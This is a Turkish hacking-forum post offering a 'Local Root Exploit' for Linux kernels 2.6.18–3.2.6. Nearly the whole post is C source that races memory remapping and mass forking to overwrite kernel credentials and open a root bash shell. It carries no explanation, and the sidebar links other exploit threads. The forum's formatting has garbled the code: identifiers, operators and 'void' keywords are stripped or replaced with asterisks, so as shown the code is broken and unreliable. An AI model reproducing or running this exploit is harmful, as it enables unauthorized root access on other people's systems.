Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
2.6.18 408 / 3.2.6 2012 Local Root Exploit
#1
PHP Kod:
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

#define MREMAP_MAYMOVE    1
#define MREMAP_FIXED    2

#define str(s)     #s
#define xstr(s) str(s)

#define DSIGNAL        SIGCHLD
#define CLONEFL        (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR    0x2000

#define RNDINT        512

#define NUMVMA        (3 * 5 * 257)
#define NUMFORK        (17 * 65537)

#define DUPTO        1000
#define TMPLEN        256

#define __NR_sys_mremap    163

_syscall5(ulongsys_mremapulongaulongbulongculongdulonge);
unsigned long sys_mremap(unsigned long addrunsigned long old_lenunsigned long
new_len
,
             
unsigned long flagsunsigned long new_addr);


static 
volatile int pid 0ppidhpid, *victim, *fopsblah 0dummy 0uid,
gid;
static 
volatile int *vma_ro, *vma_rw, *tmp;
static 
volatile unsigned fake_file[16];


**** 
fatal(const char msg)
{
    
printf("\n");
    if (!
errno) {
        
fprintf(stderr"FATAL: %s\n"msg);
    } else {
        
perror(msg);
    }

    
printf("\nentering endless loop");
    
fflush(stdout);
    
fflush(stderr);
    while (
1pause();
}

**** 
kernel_code(**** * fileloff_t offsetint origin)
{
    
int ic;
    
int *v;

    if (!
file)
        goto 
out;

    
__asm__("movl    %%esp, %0" : : "m" (c));

    
&= 0xffffe000;
    
= (**** *) c;

    for (
0PAGE_SIZE sizeof(*v) - 1i++) {
        if (
v[i] == uid && v[i+1] == uid) {
            
i++; v[i++] = 0v[i++] = 0v[i++] = 0;
        }
        if (
v[i] == gid) {
            
v[i++] = 0v[i++] = 0v[i++] = 0v[i++] = 0;
            break;
        }
    }
out:
    
dummy++;
}

**** 
try_to_exploit(****)
{
    
int v 0;

    
+= fops[0];
    
+= fake_file[0];

    
kernel_code(00v);
    
lseek(DUPTO0SEEK_SET);

    if (
geteuid()) {
        
printf("\nFAILED uid!=0"); fflush(stdout);
        
errno =- ENOSYS;
        
fatal("uid change");
    }

    
printf("\n[+] PID %d GOT UID 0, enjoy!"getpid()); fflush(stdout);

    
kill(ppidSIGUSR1);
    
setresuid(000);
    
sleep(1);

    
printf("\n\n"); fflush(stdout);

    
execl("/bin/bash""bash"NULL);
    
fatal("burp");
}

**** 
cleanup(int v)
{
    
victim[DUPTO] = victim[0];
    
kill(0SIGUSR2);
}


**** 
redirect_filp(int v)
{
    
printf("\n[!] parent check race... "); fflush(stdout);

    if (
victim[DUPTO] && victim[0] == victim[DUPTO]) {
        
printf("SUCCESS, cought SLAB page!"); fflush(stdout);
        
victim[DUPTO] = (unsigned) & fake_file;
        
signal(SIGUSR1, &cleanup);
        
kill(pidSIGUSR1);
    } else {
        
printf("FAILED!");
    }
    
fflush(stdout);
}

int get_slab_objs(****)
{
    
FILE fp;
    
int cd00;
    static 
char line[TMPLEN], name[TMPLEN];

    
fp fopen("/proc/slabinfo""r");
    if (!
fp)
        
fatal("fopen");

    
fgets(namesizeof(name) - 1fp);
    do {
        
=- 1;
        if (!
fgets(linesizeof(line) - 1fp))
            break;
sscanf(line"%s %u %u %u %u %u %u"name, &u, &a, &d, &d, &d, &d);
    } while (
strcmp(name"size-4096"));
   
    
fclose(fp);

    return 
== : -1;
}

**** 
unprotect(int v)
{
    
int n1;

    *
victim 0;
    
printf("\n[+] parent unprotected PTE "); fflush(stdout);

    
dup2(02);
    while (
1) {
        
get_slab_objs();
        if (
0)
            
fatal("read slabinfo");
        if (
0) {
            
printf("\n    depopulate SLAB #%d"c++);
            
blah 0kill(hpidSIGUSR1);
            while (!
blahpause();
        }
        if (!
n) {
            
blah 0kill(hpidSIGUSR1);
            while (!
blahpause();
            
dup2(0DUPTO);
            break;
        }
    }

    
signal(SIGUSR1, &redirect_filp);
    
kill(pidSIGUSR1);
}

**** 
cleanup_vmas(****)
{
    
int i NUMVMA;

    while (
1) {
        
tmp mmap((**** *) (PAGEADDR PAGE_SIZE), PAGE_SIZEPROT_READ,
                
MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE00);
        if (
tmp != (**** *) (PAGEADDR PAGE_SIZE)) {
            
printf("\n[-] ERROR unmapping %d"i); fflush(stdout);
            
fatal("unmap1");
        }
        
i--;
        if (!
i)
            break;

    
tmp mmap((**** *) (PAGEADDR PAGE_SIZE), PAGE_SIZEPROT_READ|PROT_WRITE,
                
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS00);
    if (
tmp != (**** *) (PAGEADDR PAGE_SIZE)) {
            
printf("\n[-] ERROR unmapping %d"i); fflush(stdout);
            
fatal("unmap2");
        }
        
i--;
        if (!
i)
            break;
    }
}

**** 
catchme(int v)
{
    
blah++;
}

**** 
exitme(int v)
{
    
_exit(0);
}

**** 
childrip(int v)
{
    
waitpid(-10WNOHANG);
}

**** 
slab_helper(****)
{
    
signal(SIGUSR1, &catchme);
    
signal(SIGUSR2, &exitme);
    
blah 0;

    while (
1) {
        while (!
blahpause();

        
blah 0;
        if (!
fork()) {
            
dup2(0DUPTO);
            
kill(getppid(), SIGUSR1);
            while (
1pause();
        } else {
            while (!
blahpause();
            
blah 0kill(ppidSIGUSR2);
        }
    }
    exit(
0);
}

int main(****)
{
    
int irvcnt;
    
time_t start;

    
srand(time(NULL) + getpid());
    
ppid getpid();
    
uid getuid();
    
gid getgid();

    
hpid fork();
    if (!
hpid)
        
slab_helper();

    
fops mmap(0PAGE_SIZEPROT_EXEC|PROT_READ|PROT_WRITE,
            
MAP_PRIVATE|MAP_ANONYMOUS00);
    if (
fops == MAP_FAILED)
        
fatal("mmap fops VMA");
    for (
0PAGE_SIZE sizeof(*fops); i++)
        
fops[i] = (unsigned)&kernel_code;
    for (
0sizeof(fake_file) / sizeof(*fake_file); i++)
        
fake_file[i] = (unsigned)fops;

    
vma_ro mmap(0PAGE_SIZEPROT_READMAP_PRIVATE|MAP_ANONYMOUS00);
    if (
vma_ro == MAP_FAILED)
        
fatal("mmap1");

    
vma_rw mmap(0PAGE_SIZEPROT_READ|PROT_WRITEMAP_PRIVATE|MAP_ANONYMOUS00);
    if (
vma_rw == MAP_FAILED)
        
fatal("mmap2");

    
cnt NUMVMA;
    while (
1) {
        
sys_mremap((ulong)vma_ro00MREMAP_FIXED|MREMAP_MAYMOVEPAGEADDR);
        if (
== (-1)) {
            
printf("\n[-] ERROR remapping"); fflush(stdout);
            
fatal("remap1");
        }
        
cnt--;
        if (!
cnt) break;

        
sys_mremap((ulong)vma_rw00MREMAP_FIXED|MREMAP_MAYMOVEPAGEADDR);
        if (
== (-1)) {
            
printf("\n[-] ERROR remapping"); fflush(stdout);
            
fatal("remap2");
        }
        
cnt--;
        if (!
cnt) break;
    }

    
victim mmap((*****)PAGEADDRPAGE_SIZEPROT_EXEC|PROT_READ|PROT_WRITE,
            
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS00);
    if (
victim != (**** *) PAGEADDR)
        
fatal("mmap victim VMA");

    
= *victim;
    *
victim 1;

    
signal(SIGUSR1, &unprotect);
    
signal(SIGUSR2, &catchme);
    
signal(SIGCHLD, &childrip);
    
printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
    
start time(NULL);

    
cnt NUMFORK;
    
0;
    while (
1) {
        
cnt--;
        
v--;
        
dummy += *victim;

        if (
cnt 1) {
            
__asm__(
            
"pusha                \n"
            "movl %1, %%eax            \n"
            "movl $("
xstr(CLONEFL)"), %%ebx    \n"
            "movl %%esp, %%ecx        \n"
            "movl $120, %%eax        \n"
            "int  $0x80            \n"
            "movl %%eax, %0            \n"
            "popa                \n"
            
: : "m" (pid), "m" (dummy)
            );
        } else {
            
pid fork();
        }

        if (
pid) {
            if (
<= && cnt 0) {
                
float etatm;
                
rand() % RNDINT RNDINT 2;
                
tm eta = (float)(time(NULL) - start);
                
eta *= (float)NUMFORK;
                
eta /= (float)(NUMFORK cnt);
                
printf("\r\t%u of %u [ %u %%  ETA %6.1f s ]          ",
                
NUMFORK cntNUMFORK, (100 * (NUMFORK cnt)) / NUMFORKeta tm);
                
fflush(stdout);
            }
            if (
cnt) {
                
waitpid(pid00);
                continue;
            }
            if (!
cnt) {
                while (
1) {
                     
wait(NULL);
                     if (
== pid) {
                    
cleanup_vmas();
                    while (
1) { kill(0SIGUSR2); kill(0SIGSTOP); pause(); }
                     }
                }
            }
        }

        else {
            
cleanup_vmas();

            if (
cnt 0) {
                
_exit(0);
            }

        
printf("\n[+] rooting done..the moment of truth..."); fflush(stdout);
            
sleep(1);

            
signal(SIGUSR1, &catchme);
            
munmap(0PAGE_SIZE);
            
dup2(02);
            
blah 0kill(ppidSIGUSR1);
            while (!
blahpause();

            
munmap((**** *)victimPAGE_SIZE);
            
dup2(0DUPTO);

            
blah 0kill(ppidSIGUSR1);
            while (!
blahpause();
            
try_to_exploit();
            while (
1pause();
        }
    }
    return 
0;

Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  2016 Güncel Exploit Dökümanı + Videolu Anlatım KingSkrupellos 5 279 04-12-2016, Saat: 00:31
Son Yorum: DeaTHKNighT33
  Windows Server Root Kısa Videolu Anlatım KingSkrupellos 7 159 21-11-2016, Saat: 13:06
Son Yorum: Gardiyan
  vBulletin 5.1.2 SQL Injection Exploit Mrxxx 0 39 20-11-2016, Saat: 11:36
Son Yorum: Mrxxx
  Web hack - Exploit Kurena (Perl) archavin 33 3,512 14-07-2016, Saat: 19:58
Son Yorum: azeredhat
  PHP Scriptlerde SQLi Tespiti ve Exploit Etme H4Sec 113 5,700 02-03-2016, Saat: 16:13
Son Yorum: hasancaN
Anahtar Kelimeler

2.6.18 408 / 3.2.6 2012 Local Root Exploit indir, 2.6.18 408 / 3.2.6 2012 Local Root Exploit Videosu, 2.6.18 408 / 3.2.6 2012 Local Root Exploit Online izle, 2.6.18 408 / 3.2.6 2012 Local Root Exploit Bedava indir, 2.6.18 408 / 3.2.6 2012 Local Root Exploit Yükle, 2.6.18 408 / 3.2.6 2012 Local Root Exploit Hakkında, 2.6.18 408 / 3.2.6 2012 Local Root Exploit Nedir, 2.6.18 408 / 3.2.6 2012 Local Root Exploit Free indir, 2.6.18 408 / 3.2.6 2012 Local Root Exploit Oyunu, 2.6.18 408 / 3.2.6 2012 Local Root Exploit Download


1 Ziyaretçi